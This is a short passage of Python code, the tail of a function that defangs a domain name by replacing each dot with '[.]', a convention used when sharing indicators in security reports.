    :return: Sanitized domain
    """
    return domain.replace(".", "[.]")
